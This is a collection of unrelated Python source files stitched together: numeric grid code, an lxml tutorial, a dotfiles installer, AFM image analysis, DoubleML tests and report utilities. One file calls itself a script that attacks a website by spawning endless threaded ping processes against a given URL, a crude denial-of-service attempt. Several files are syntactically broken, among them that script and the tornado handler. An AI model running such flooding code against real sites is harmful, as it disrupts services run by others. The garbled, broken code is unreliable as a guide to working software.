return subgrid with probability of occupancy
and subgrid location
default subsize 0 -- just pick the center cell and return this
if cell outside of grid, returns size-0 subgrid
"""
def mapNormal2Subgrid(normalparams, gridstart, gridstep, gridlen, subsize = 0):
meanx, meany, varx, vary, covxy = normalparams
tilex = int(np.floor(meanx/gridstep[0]))-gridstart[0]
tiley = int(np.floor(meany/gridstep[1]))-gridstart[1]
tilexmin = max(tilex-subsize, 0)
tilexmax = min(tilex+subsize+1,gridlen[0])
tileymin = max(tiley-subsize, 0)
tileymax = min(tiley+subsize+1,gridlen[1])
subgridstart = np.array((tilexmin, tileymin))
subgridlen = np.array((tilexmax-tilexmin, tileymax-tileymin))
if any(subgridlen <= 0): # size-0 subgrid
return np.array((0,0)), np.zeros((0,0))
subgrid = mapNormal2GridRot(meanx, meany, varx, vary, covxy,
subgridstart + gridstart, gridstep, subgridlen)
return subgridstart, subgrid
"""
test reorientation, normal mapping, and mixing
"""
if __name__ == '__main__':
import matplotlib.pyplot as plt
plt.ioff()
gridstart = np.array((-4,-2))
gridlen = np.array((8,8))
gridstep = np.array((3.,3.))
meanx = -3.
meany = 8.
varx = 4.**2
vary = 3.**2
covxy = .2*4*3
normalmean = np.array((meanx, meany))
normalvar = np.array(((varx, covxy), (covxy, vary)))
## make a high-res mesh of the normal distribution
hresgridx, hresgridy = np.meshgrid(np.linspace(-12., 12, 100),
np.linspace(-6., 18, 100))
precvals, precvec = np.linalg.eigh(normalvar)
# rectvarx, rectvary, precvecx, precvecy = eigTwoxTwo(4., 4., -1.)
# precvals = np.array((rectvarx, rectvary))
# precvec = np.array(((precvecx, -precvecy),(precvecy, precvecx)))
precvals = 1/precvals
ll1 = precvals[0]*(precvec[0,0]*(hresgridx-normalmean[0]) +
precvec[1,0]*(hresgridy-normalmean[1]))
ll2 = precvals[1]*(precvec[0,1]*(hresgridx-normalmean[0]) +
precvec[1,1]*(hresgridy-normalmean[1]))
ll = np.exp(-.5*(ll1*ll1 + ll2*ll2))
## map the normal distribution to the grid
outgrid = mapNormal2GridRot(meanx, meany, varx, vary, covxy,
gridstart, gridstep, gridlen)
## compare mapped distribution to correct version
plt.subplot(121).contour(hresgridx, hresgridy, ll)
outgridForShow = outgrid.T[::-1]
plt.subplot(122).imshow(outgridForShow)
plt.show()
# ## re-orient distribution
#transform = np.array(((1.,0,-4),(0,1,0),(0,0,1)))
transform = np.array(((.9798, -.2, -2.), (.2, .9798, 0), (0,0,1)))
initial_val = .1
reoriented1 = reOrientGridOld(outgrid, transform, initial_val,
gridstep, gridstart, gridlen)
reoriented2 = reOrientGrid(outgrid, transform, initial_val,
gridstep, gridstart, gridlen)
plt.figure(figsize=(10.,8.))
plt.subplot(221).imshow(outgrid.T[::-1])
plt.subplot(223).imshow(reoriented1.T[::-1])
plt.subplot(224).imshow(reoriented2.T[::-1])
plt.show() |
from lxml import etree
# get doc tree
doc = etree.parse('home.xml')
# get root element
root = doc.getroot()
print etree.tostring(root)
'''
<html>
<head>
<title>Your page title here</title>
<link href="mystyle.css" rel="stylesheet" type="text/css"/>
</head>
<body>
<p>this is first paragraph</p>
<p>this is second paragraph</p>
<body/>
<foot/>
</html>
'''
# elements are a list
print len(root)
# 2
child = root[0]
print child.tag
# head
# node has no subnodes
print not root[-1]
# True
# node exists
print root[-1] is None
# False
print root[0].getnext().tag
# body
print root[1].getprevious().tag
# head
print child.getparent().tag
# html
# deprecated
for child in root.getchildren():
print child.tag
# head
# body
# foot
for child in root:
print child.tag
# head
# body
# foot
# find node's first child node
print len(root.find('head'))
2
for p in root.findall('body/p'):
print p.text
# this is first paragraph
# this is second paragraph
# attributes are a dict
link = root.find('head/link')
print link.keys()
# ['href', 'rel', 'type']
print link.items()
# [('href', 'mystyle.css'), ('rel', 'stylesheet'), ('type', 'text/css')]
print link.get('type')
# text/css
print link.attrib['type']
# text/css
# find the text inside a specific element
print root.findtext('body/p')
# this is first paragraph
# xpath expression
# find an Element anywhere in the tree
# (when searching on individual elements, the path must not start with a slash.
# you can add a leading period(.), if necessary)
print root.find('.//p').text
# this is first paragraph
print doc.find('//p').text
# this is first paragraph
for p in root.xpath('//p'):
print p.text
# this is first paragraph
# this is second paragraph
# (Note that the text, tail and children of an Element are not necessarily there
# yet when receiving the start event. Only the end event guarantees that the Element
# has been parsed completely.)
for event, element in etree.iterparse('home.xml', events = ('start', 'end'), tag = 'body'):
print event, element.tag
# start body
# end body
|
# Utilities for installing sbp_linux_config on a machine.
import os
import os.path as p
import shutil
import stat
import string
import sys
import subprocess
# Build the set of paths used by sbp_linux_config during installation.
HOME = os.getenv('HOME')
assert len(HOME) > 0
SBP = p.join(HOME, 'sbp')
# Most of the results of the installation process are placed here and then
# symlinked to as appropriate. The three main things I put in ~/sbp/bin:
# dotfiles - targets of .symlinks in ~
# scripts - executables to be placed on $PATH
# python - libraries to be placed on $PYTHONPATH
BIN = p.join(SBP, 'bin')
DOTFILES_BIN = p.join(BIN, 'dotfiles')
SCRIPTS_BIN = p.join(BIN, 'scripts')
PYTHON_BIN = p.join(BIN, 'python')
SBP_LINUX_CONFIG = p.join(SBP, 'sbp_linux_config')
COMMON_TEXT = p.join(SBP_LINUX_CONFIG, 'common-text')
# Some config files of special significance.
I3_CONF = p.join(BIN, 'dotfiles/i3/config')
TERMINATOR_CONF = p.join(BIN, 'dotfiles/config/terminator/config')
APPLY_MATE_SETTINGS = p.join(BIN, 'scripts/apply-sbp-mate-settings')
# Standard Go binaries to install.
INSTALL_BINARIES = {
'back-impl': './sbpgo/back_main',
'format-percent': './sbpgo/format_percent_main',
'i3blocks-netusage': './sbpgo/network_usage_main',
'i3blocks-pad': './sbpgo/i3blocks_pad_main',
'i3blocks-recolor': './sbpgo/i3blocks_recolor_main',
'sbp-prompt': './sbpgo/prompt_main',
'vsleep': './sbpgo/sleep_main',
}
# Utility methods for manipulating config files.
def ReadFile(name):
with open(name) as f:
return f.read()
def WriteFile(name, text):
with open(name, 'w') as f:
f.write(text)
def InsertBefore(text, afterLine, newLine):
""" Inserts newLine into text, right before afterLine. """
lines = text.splitlines()
lineNum = lines.index(afterLine)
assert lineNum >= 0
lines.insert(lineNum, newLine)
return '\n'.join(lines)
def ConcatLines(a, b):
"""Concatenates the lines of text from 'a' and 'b'."""
# Separate a and b by a blank line.
lines = a.splitlines() + [''] + b.splitlines()
return '\n'.join(lines)
def ForceLink(target, linkName):
""" Forces a symlink, even if the linkName already exists. """
if p.islink(linkName) or p.isfile(linkName):
# Don't handle the case where linkName is a directory--it's too easy to
# blow away existing config folders that way.
os.remove(linkName)
print('Linking %s' % linkName)
os.symlink(target, linkName)
def InstallBinary(src, dest):
"""Ensures the binary gets chmod+x, as apparently Bazel doesn't always do that
automatically.
"""
print('Copying %s' % dest)
shutil.copyfile(src, dest)
os.chmod(dest, os.stat(dest).st_mode | stat.S_IXUSR)
# Recursive helper for linking over individual files in the tree rooted at
# dotfiles.
def LinkDotfiles(targetDir, linkDir, addDot):
if not p.exists(linkDir):
print('Creating %s' % linkDir)
os.mkdir(linkDir)
for childName in os.listdir(targetDir):
targetChild = p.join(targetDir, childName)
linkChildName = '.' + childName if addDot else childName
linkChild = p.join(linkDir, linkChildName)
if p.isfile(targetChild):
ForceLink(targetChild, linkChild)
elif p.isdir(targetChild):
# Recurse, and don't add any more dots.
LinkDotfiles(targetChild, linkChild, False)
def StandardInstallation(appendDirs, install_binaries):
""" Invokes the standard install procedure.
1. Copies everything from ~/sbp/sbp_linux_config/text to ~/sbp/bin.
2. Makes several symlinks in standard places (such as ~) that point
to the appropriate files in ~/sbp/bin.
3. If arguments are provided, each is interpreted as a directory which
may contain zero or more subdirectories corresponding to the
subdirectories of ~/sbp/sbp_linux_config/text. Each file in each of these
directories is read in and appended to the corresponding file in
~/sbp/bin. If no such file exists yet in ~/sbp/bin, it is created with
the appended contents. This provides a simple mechanism for adding
per-machine customizations.
4. Installs binaries from 'install_binaries'. Keys are destination names;
values are paths to copy from.
"""
# Clean out any existing bin stuff.
if p.isdir(BIN):
shutil.rmtree(BIN)
# Perform the copy.
shutil.copytree(COMMON_TEXT, BIN)
# Process arguments to see if they contain append-files.
for appendDir in appendDirs:
if not p.exists(appendDir):
print('Skipping non-existent appendDir: %s' % appendDir)
continue
assert p.isdir(appendDir), appendDir
# Look at every file in the appendDir.
for root, dirs, files in os.walk(appendDir):
# Make root relative to the appendDir, since we'll want to use it both in
# the appendDir and in BIN.
root = p.relpath(root, appendDir)
for fil in files:
# Compute the full path from the appendDir to the file.
fil = p.join(root, fil)
appendSource = p.join(appendDir, fil)
appendDest = p.join(BIN, fil)
if p.exists(appendDest):
print('Appending %s' % appendSource)
with open(appendDest) as f:
text = f.read()
while not text.endswith('\n\n'):
text += '\n'
with open(appendSource) as f:
text += f.read()
with open(appendDest, 'w') as f:
f.write(text)
else:
print('Copying %s' % appendSource)
# Make sure the target directory exists.
destDir, _ = p.split(appendDest)
if not p.exists(destDir):
os.makedirs(destDir)
shutil.copy(appendSource, appendDest)
# Link over dotfiles.
LinkDotfiles(DOTFILES_BIN, HOME, True)
# Link in all the other scripts that should be on the path.
ForceLink(SCRIPTS_BIN, p.join(HOME, 'bin'))
ForceLink(PYTHON_BIN, p.join(HOME, 'python'))
# Configure cron.
print("Installing .crontab")
subprocess.call(['crontab', p.join(HOME, '.crontab')])
# Install binaries.
for dest in install_binaries:
InstallBinary(install_binaries[dest], p.join(SCRIPTS_BIN, dest))
def LaptopInstallation():
""" Meant to be invoked after StandardInstallation() for laptops. Adds some
useful configuration settings for laptops.
"""
SetMonospaceFontSize(15)
def SetMonospaceFontSize(size):
terminator_config = ReadFile(TERMINATOR_CONF)
print('Setting terminator font size')
terminator_config = terminator_config.replace(
'Ubuntu Mono 15', 'Ubuntu Mono %d' % size)
WriteFile(TERMINATOR_CONF, terminator_config)
apply_mate_settings = ReadFile(APPLY_MATE_SETTINGS)
print('Setting system monospace font size')
apply_mate_settings = apply_mate_settings.replace(
'Ubuntu Mono 15', 'Ubuntu Mono %d' % size)
WriteFile(APPLY_MATE_SETTINGS, apply_mate_settings)
|
#-*- coding: utf-8 -*-
import tornado.web, tornado.httpserver, tornado.ioloop
import pymongo
class MainHandler(tornado.web.RequestHandler):
def get(self):
data = self.application.db.find()
tat = {}
for tt in data:
tat.append({'day1':trs(tt)}{'name': tt['name'],
'num': tt['num'],
'solved': tt['solved'],
'solving': tt['solving'],
})
tat.sort(key=lambda x:x['num'], reverse=True)
for i in range(0, len(tat)):
tat[i]['rank']=str(i+1)
qaq = []
al = len(tat)
col_num = (len(tat)+149)//150
for r in range(0,min(150,al)):
tmp = []
i = r
while i<al:
tmp.append(tat[i])
i+=150
qaq.append(tmp)
self.render('index.html', data=qaq, col_num=col_num)
class Application(tornado.web.Application):
def __init__(self):
handlers=[(r'/', MainHandler),
]
settings={'template_path': 'templates',
'debug': True,
}
self.db=pymongo.MongoClient()
tornado.web.Application.__init__(self, handlers, **settings)
if __name__ == '__main__':
server=tornado.httpserver.HTTPServer(Application())
server.listen('5050')
tornado.ioloop.IOLoop.instance().start() |
# Jonathan wants me to average some pixels
# He gave me a newly made directory of png files spit out of my program to identify the data, instead of the data files themselves.
# I will have to identify the data files like this ..
import os
from matplotlib.widgets import RectangleSelector
import pandas as pd
from afm_analysis import *
psplit = os.path.split
pjoin = os.path.join
outputdir = '2017-10-11_Pressure_Analysis'
if not os.path.isdir(outputdir):
os.makedirs(outputdir)
# I selected the relevant data from the original data files in the past, but the code to do it again is still here
dataframefile = pjoin(outputdir, 'Scan_Data.pd')
if os.path.isfile(dataframefile):
df = pd.read_pickle(dataframefile)
else:
# Need to generate the data
'''
interest = []
for root, dirs, files in os.walk(r'X:\emrl\Pool\Bulletin\Rupp\AFM Tyler Height Evaluation'):
for f in files:
if f.endswith('.png'):
interest.append(os.path.join(root, f))
'''
interest = ['X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 06 27\\105212_15_1.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 06 27\\105212_21_1_r.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 06 27\\105212_28_1.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 06 27\\145141_7_1.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 04\\135243_7_1.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 11\\101901_10_1.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 11\\101901_20_1.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 11\\101901_25_1.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 11\\134017_13_1.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 11\\134017_7_2.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 18\\094054_10_1.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 08 02\\143931_16_1.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 08 02\\143931_18_1.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 08 02\\143931_25_1.png',
'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 08 02\\143931_7_1.png']
ids = [psplit(fn)[-1][:-4].strip('_r') for fn in interest]
# Even the date string is a completely different format. Make old format from new format.
# Christ ...
dates = [psplit(psplit(fp)[0])[-1].split(' ') for fp in interest]
monthnames = ['', 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
datestrings = ['-'.join((d[2], monthnames[int(d[1])], d[0])) for d in dates]
# Or could just find the files in the original data folders by brute force...
'''
pngfns = [psplit(fp)[-1] for fp in interest]
pngorigin = []
for pngfn in pngfns:
for root, dirs, files in os.walk('C:\\t\\LCAFM'):
for f in files:
if f == pngfn:
pngorigin.append(pjoin(root, f))
'''
# Load all the dataframes containing the images of interest
datafolders = np.unique(datestrings)
dframes = {}
for datafolder in datafolders:
datafile = pjoin(r'C:\t\LCAFM', datafolder, datafolder + '.df')
dframes[datafolder] = pd.read_pickle(datafile)
# Make a new dataframe containing only the images of interest
dflist = []
for id, datestring in zip(ids, datestrings):
datedf = dframes[datestring]
dflist.append(datedf[datedf.id == id][datedf.type == 'xy'])
df = pd.concat(dflist)
df.to_pickle(dataframefile)
df = df[df.type == 'xy'].dropna(how='all')
df['scan'] = df['scan'].apply(lambda s: s[5:-5])
df['scan2'] = df['scan2'].apply(lambda s: s[5:-5])
df['corrscan'] = df['scan'].apply(lambda s: 1e9 * (s - fitplane(s)))
df['corrscan2'] = df['scan2'].apply(lambda s: 1e9 * (s - fitplane(s)))
summaryfile = pjoin(outputdir, 'Region_stats.csv')
with open(summaryfile, 'w') as f:
# Write a header
# Data gets written afterward
f.write('id,region,imin,imax,jmin,jmax,topo_mean,topo_max,topo_min,topo_std,current_mean,current_min,current_max,current_std\n')
# Group by measurement of interest
for k,g in df.groupby('id'):
breakloop = False
plot_cafm(g, scaleaxes=False)
fig = gcf()
topoax, currentax, _, _ = fig.get_axes()
currentdata = g[g['channel_name'] == 'I'].iloc[0].scan
topodata = g[g['channel_name'] == 'Z'].iloc[0].corrscan
height_pix, width_pix = shape(topodata)
width_nm = g.iloc[0].width
height_nm = g.iloc[0].height
# pixels were converted to nm, this converts back
def convert_nm_to_pix(xnm, ynm):
xpix = width_pix / 2 + xnm * width_pix / width_nm / 1e9
ypix = height_pix / 2 - ynm * height_pix / height_nm / 1e9
return (int(ypix), int(xpix))
vertices = []
slices = []
n = 0
def onselect(eclick, erelease):
global n
x0, y0 = int(eclick.xdata), int(eclick.ydata)
x1, y1 = int(erelease.xdata), int(erelease.ydata)
x0, y0 = eclick.xdata, eclick.ydata
x1, y1 = erelease.xdata, erelease.ydata
xmin, xmax = min(x0, x1), max(x0, x1)
ymin, ymax = min(y0, y1), max(y0, y1)
# Arrays are indexed the opposite way
# And there is a scaling factor and an offset ....
# And the y axis is inverted...
#imin, jmin = convert_nm_to_pix(xmin, ymin)
#imax, jmax = convert_nm_to_pix(xmax, ymax)
# I am now plotting directly in pixels to avoid a lot of headache
imin, imax = int(ymin), int(ymax)
jmin, jmax = int(xmin), int(xmax)
vertices.append((imin, imax, jmin, jmax))
slices.append(np.s_[imin:imax, jmin:jmax])
# if imshow has no "extent" specified:
#slices.append(np.s_[ymin:ymax, xmin:xmax])
xmid = (x0 + x1) / 2
ymid = (y0 + y1) / 2
ax = gca()
# Draw rectangles and put some information there
bbox={'facecolor':'black', 'alpha':.5}
currentax.add_patch(Rectangle((x0, y0), x1-x0, y1-y0, fill=False, color='white'))
meancurrent = np.mean(currentdata[slices[-1]]) * 1e9
currentax.text(xmid, ymid, '{}\n{:.4f}'.format(n, meancurrent), color='white', bbox=bbox, horizontalalignment='center', verticalalignment='center')
topoax.add_patch(Rectangle((x0, y0), x1-x0, y1-y0, fill=False, color='white'))
meantopo = np.mean(topodata[slices[-1]])
topoax.text(xmid, ymid, '{}\n{:.4f}'.format(n, meantopo), color='white', bbox=bbox, horizontalalignment='center', verticalalignment='center')
n += 1
def selector(event):
if event.key in ['N', 'n'] and selector.RS1.active:
print('Next measurement ...')
selector.RS1.set_active(False)
selector.RS2.set_active(False)
if event.key in ['Q', 'q']:
breakloop = True
selector.RS1.set_active(False)
selector.RS2.set_active(False)
selector.RS1 = RectangleSelector(topoax, onselect)
selector.RS2 = RectangleSelector(currentax, onselect)
connect('key_press_event', selector)
while selector.RS1.active:
plt.pause(.5)
if breakloop:
# For some reason break doesn't break here
break
# Write files
id = g.id.iloc[0]
fig.savefig(pjoin(outputdir, id + '.png'))
# Rectangle vertices in pixels and in nm
#savetxt(pjoin(outputdir, id + '_vertices_nm.csv'))
# Write information about each region
with open(summaryfile, 'a') as f:
for region, (slice, vert)in enumerate(zip(slices, vertices)):
imin, imax, jmin, jmax = vert
toposlice = topodata[slice]
currentslice = currentdata[slice]
flattopo = toposlice.flatten()
flatcurrent = currentslice.flatten()
meantopo = np.mean(flattopo)
meancurrent = np.mean(flatcurrent)
maxtopo = np.max(flattopo)
maxcurrent = np.max(flatcurrent)
mintopo = np.min(flattopo)
mincurrent = np.min(flatcurrent)
stdtopo = np.std(flattopo)
stdcurrent = np.std(flatcurrent)
paramlist = [id, region, imin, imax, jmin, jmax, meantopo, maxtopo, mintopo, stdtopo, meancurrent, mincurrent, maxcurrent, stdcurrent]
paramstring = ','.join([format(thing) for thing in paramlist]) + '\n'
f.write(paramstring)
topopath = pjoin(outputdir, id + '_topo_region_{:02}.csv'.format(region))
currentpath = pjoin(outputdir, id + '_current_region_{:02}.csv'.format(region))
np.savetxt(topopath, toposlice, delimiter=',')
np.savetxt(currentpath, currentslice, delimiter=',')
# for troubleshooting when onselect has as error and RectangleSelector does not show it
'''
class dummyclick(object):
def __init__(self, x, y):
self.xdata = x
self.ydata = y
onselect(dummyclick(0, 0), dummyclick(1,1))
'''
|
# Prints a dictionary of the count of each character in the given string
# No comparison is performed, must be checked by eye. Or just implement the
# comparison, whatever is easier ¯\_(ツ)_/¯
from collections import OrderedDict
def check(s):
od = OrderedDict()
for c in s:
if c not in od:
od[c] = 1
else:
od[c] += 1
return od
def main():
s1 = "80f82fc0e320fe3e2aba1e15644ee6d5622a5f463f7145dd0b74caa3898e9f0f"
s2 = "83538ab1c15f7a89050be8dbdf7f99cfc31cf501bbf4625992e067391f44599f"
chars1 = check(s1)
chars2 = check(s2)
print(chars1)
print(chars2)
if __name__ == "__main__":
main()
|
import pytest
import numpy as np
from doubleml import DoubleMLPLR, DoubleMLIRM, DoubleMLIIVM, DoubleMLPLIV
from doubleml.datasets import make_plr_CCDDHNR2018, make_irm_data, make_pliv_CHS2015, make_iivm_data
from sklearn.linear_model import Lasso, LogisticRegression
np.random.seed(3141)
dml_data_plr = make_plr_CCDDHNR2018(n_obs=100)
dml_data_pliv = make_pliv_CHS2015(n_obs=100, dim_z=1)
dml_data_irm = make_irm_data(n_obs=100)
dml_data_iivm = make_iivm_data(n_obs=100)
dml_plr = DoubleMLPLR(dml_data_plr, Lasso(), Lasso())
dml_plr.fit()
dml_pliv = DoubleMLPLIV(dml_data_pliv, Lasso(), Lasso(), Lasso())
dml_pliv.fit()
dml_irm = DoubleMLIRM(dml_data_irm, Lasso(), LogisticRegression())
dml_irm.fit()
dml_iivm = DoubleMLIIVM(dml_data_iivm, Lasso(), LogisticRegression(), LogisticRegression())
dml_iivm.fit()
# fit models with callable scores
plr_score = dml_plr._score_elements
dml_plr_callable_score = DoubleMLPLR(dml_data_plr, Lasso(), Lasso(),
score=plr_score, draw_sample_splitting=False)
dml_plr_callable_score.set_sample_splitting(dml_plr.smpls)
dml_plr_callable_score.fit(store_predictions=True)
irm_score = dml_irm._score_elements
dml_irm_callable_score = DoubleMLIRM(dml_data_irm, Lasso(), LogisticRegression(),
score=irm_score, draw_sample_splitting=False)
dml_irm_callable_score.set_sample_splitting(dml_irm.smpls)
dml_irm_callable_score.fit(store_predictions=True)
iivm_score = dml_iivm._score_elements
dml_iivm_callable_score = DoubleMLIIVM(dml_data_iivm, Lasso(), LogisticRegression(), LogisticRegression(),
score=iivm_score, draw_sample_splitting=False)
dml_iivm_callable_score.set_sample_splitting(dml_iivm.smpls)
dml_iivm_callable_score.fit(store_predictions=True)
@pytest.mark.ci
@pytest.mark.parametrize('dml_obj',
[dml_plr, dml_pliv, dml_irm, dml_iivm])
def test_linear_score(dml_obj):
assert np.allclose(dml_obj.psi,
dml_obj.psi_a * dml_obj.coef + dml_obj.psi_b,
rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_plr_callable_vs_str_score():
assert np.allclose(dml_plr.psi,
dml_plr_callable_score.psi,
rtol=1e-9, atol=1e-4)
assert np.allclose(dml_plr.coef,
dml_plr_callable_score.coef,
rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_plr_callable_vs_pred_export():
preds = dml_plr_callable_score.predictions
g_hat = preds['ml_g'].squeeze()
m_hat = preds['ml_m'].squeeze()
psi_a, psi_b = plr_score(dml_data_plr.y, dml_data_plr.d,
g_hat, m_hat,
dml_plr_callable_score.smpls[0])
assert np.allclose(dml_plr.psi_a.squeeze(),
psi_a,
rtol=1e-9, atol=1e-4)
assert np.allclose(dml_plr.psi_b.squeeze(),
psi_b,
rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_irm_callable_vs_str_score():
assert np.allclose(dml_irm.psi,
dml_irm_callable_score.psi,
rtol=1e-9, atol=1e-4)
assert np.allclose(dml_irm.coef,
dml_irm_callable_score.coef,
rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_irm_callable_vs_pred_export():
preds = dml_irm_callable_score.predictions
g_hat0 = preds['ml_g0'].squeeze()
g_hat1 = preds['ml_g1'].squeeze()
m_hat = preds['ml_m'].squeeze()
psi_a, psi_b = irm_score(dml_data_irm.y, dml_data_irm.d,
g_hat0, g_hat1, m_hat,
dml_irm_callable_score.smpls[0])
assert np.allclose(dml_irm.psi_a.squeeze(),
psi_a,
rtol=1e-9, atol=1e-4)
assert np.allclose(dml_irm.psi_b.squeeze(),
psi_b,
rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_iivm_callable_vs_str_score():
assert np.allclose(dml_iivm.psi,
dml_iivm_callable_score.psi,
rtol=1e-9, atol=1e-4)
assert np.allclose(dml_iivm.coef,
dml_iivm_callable_score.coef,
rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_iivm_callable_vs_pred_export():
preds = dml_iivm_callable_score.predictions
g_hat0 = preds['ml_g0'].squeeze()
g_hat1 = preds['ml_g1'].squeeze()
m_hat = preds['ml_m'].squeeze()
r_hat0 = preds['ml_r0'].squeeze()
r_hat1 = preds['ml_r1'].squeeze()
psi_a, psi_b = iivm_score(dml_data_iivm.y, dml_data_iivm.z.squeeze(), dml_data_iivm.d,
g_hat0, g_hat1, m_hat, r_hat0, r_hat1,
dml_iivm_callable_score.smpls[0])
assert np.allclose(dml_iivm.psi_a.squeeze(),
psi_a,
rtol=1e-9, atol=1e-4)
assert np.allclose(dml_iivm.psi_b.squeeze(),
psi_b,
rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_pliv_callable_vs_str_score():
pliv_score = dml_pliv._score_elements
dml_pliv_callable_score = DoubleMLPLIV(dml_data_pliv, Lasso(), Lasso(), Lasso(),
score=pliv_score, draw_sample_splitting=False)
dml_pliv_callable_score.set_sample_splitting(dml_pliv.smpls)
dml_pliv_callable_score.fit()
assert np.allclose(dml_pliv.psi,
dml_pliv_callable_score.psi,
rtol=1e-9, atol=1e-4)
assert np.allclose(dml_pliv.coef,
dml_pliv_callable_score.coef,
rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_pliv_callable_not_implemented():
np.random.seed(3141)
dml_data_pliv_2z = make_pliv_CHS2015(n_obs=100, dim_z=2)
pliv_score = dml_pliv._score_elements
dml_pliv_callable_score = DoubleMLPLIV._partialX(dml_data_pliv_2z, Lasso(), Lasso(), Lasso(),
score=pliv_score)
msg = 'Callable score not implemented for DoubleMLPLIV.partialX with several instruments.'
with pytest.raises(NotImplementedError, match=msg):
dml_pliv_callable_score.fit()
dml_pliv_callable_score = DoubleMLPLIV._partialZ(dml_data_pliv_2z, Lasso(),
score=pliv_score)
msg = 'Callable score not implemented for DoubleMLPLIV.partialZ.'
with pytest.raises(NotImplementedError, match=msg):
dml_pliv_callable_score.fit()
dml_pliv_callable_score = DoubleMLPLIV._partialXZ(dml_data_pliv_2z, Lasso(), Lasso(), Lasso(),
score=pliv_score)
msg = 'Callable score not implemented for DoubleMLPLIV.partialXZ.'
with pytest.raises(NotImplementedError, match=msg):
dml_pliv_callable_score.fit()
|
from .CreateEditDelete import CreateEditDelete, DeleteReference
class Delete(CreateEditDelete):
Name = "Delete Object(s)"
def __init__(self, mapObject):
CreateEditDelete.__init__(self)
if isinstance(mapObject, list):
for obj in mapObject:
self.delete(DeleteReference(obj))
else:
self.delete(DeleteReference(mapObject))
|
# This script does multithreading system calls to attack on a website
import threading
import subprocess
import sys
lock = threading.Lock()
threads = []
def worker(name, url):
while True:
try:
lock.acquire()
print (f"Thread {name}: Hello, It is working");
lock.release()
process = subprocess.Popen (['ping', '-s', '128', url, '&&', f'echo {name} pinged {url}.' ])
threads.append (process.pid);
except:
class MyThread (threading.Thread):
def __init__ (self, name, url):
super().__init__()
self.name = name
self.url = url
def run (self):
worker(self.name, self.url);
if __name__ == '__main__':
url = sys.argv[1]
try:
for i in range (2):
MyThread (i, url).start()
except KeyboardInterrupt :
for id in threads:
subprocess.call (['kill', str(id)])
print ("Thank You for using.");
|
#!/usr/bin/python2.7
from optparse import OptionParser
from glob import glob
import os, time, datetime, sys, commands, json, ast, shutil, socket
from copy import deepcopy
from db import AzukiDB as azuki
class deleteReport(object):
def __init__(self, productName = '', globalPath = '', testBedHostIP = ''):
"""
Parse and accumulate report data write it in another file for consolidating all reports page.
param productName: <string> name of the product for which the reports needs to be accumulated.
"""
self.product = productName.upper()
self.globalPath = globalPath
self.testBedHostIP = testBedHostIP
self.JSONFile = os.path.join(self.globalPath, "report_data.json")
self.logPath = os.path.join(self.globalPath, self.product, "results")
self.jsonReportPath = os.path.join(self.logPath, "json_reports")
self.JSONList = []
def __generateLog(self):
AzukiDB = azuki()
report_ip = AzukiDB.getKeyValue('admin', 'reporting_ip')
if not report_ip:
socket_var = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
socket_var.connect(('google.com', 0))
report_ip = socket_var.getsockname()[0]
# Parsing log files
logFileParserPath = os.path.join( self.globalPath,
'sharedlib', 'reportAccumulator.py')
os.system( '/usr/bin/python '+ logFileParserPath + \
' -g ' + self.globalPath + \
' -H ' + report_ip)
def delete(self, reportNames):
if not reportNames:
print "No report names passed."
return
for report in reportNames:
baseName = report.split('.')[0]
try:
prod, user, type, blank, timestamp = baseName.split('_')
except:
prod, user1, user2, type, blank, timestamp = baseName.split('_')
user = "_".join([user1, user2])
try:
# remove all the files of same timestamp
[ os.remove(file) for file in glob(os.path.join( self.logPath, "*%s.*" %(timestamp) )) ]
# create json_report directory path
timestamp = datetime.datetime.strftime(datetime.datetime.\
strptime(timestamp,\
"%Y%m%d-%H%M"), "%Y-%m-%d_%H-%M")
json_dir_path = os.path.join( self.jsonReportPath, "%s_%s_%s" %( prod, user, timestamp ) )
# remove json_report directory
shutil.rmtree(json_dir_path)
except:
pass
# Re-generate reporting data
self.__generateLog()
def getOptsAndArgs(args):
"""
Getting options and arguments passed to this script
param args: in place system arguments sent to the script
"""
parser = OptionParser()
parser.add_option('-P', '--product',
action='store', dest='productName',
help='Product name.'
)
parser.add_option('-g', '--globalpath',
action='store', dest='globalPath',
help='Global path.'
)
parser.add_option('-H', '--hostip',
action='store', dest='testBedHostIP',
help='Testbed host IP.'
)
parser.add_option('-L', '--reportnames',
action='store', dest='reportNames',
help='Array of report names'
)
options, args = parser.parse_args()
return options, args
#__main__
if __name__ == '__main__':
"""
Usage: python deleteReport.py -P HLS -g <absolute path to the root directory> -H <ip address of the automation server>
"""
options, args = getOptsAndArgs(sys.argv[1:])
options.reportNames = ast.literal_eval(options.reportNames)
message = deleteReport(productName=options.productName,
globalPath=options.globalPath,
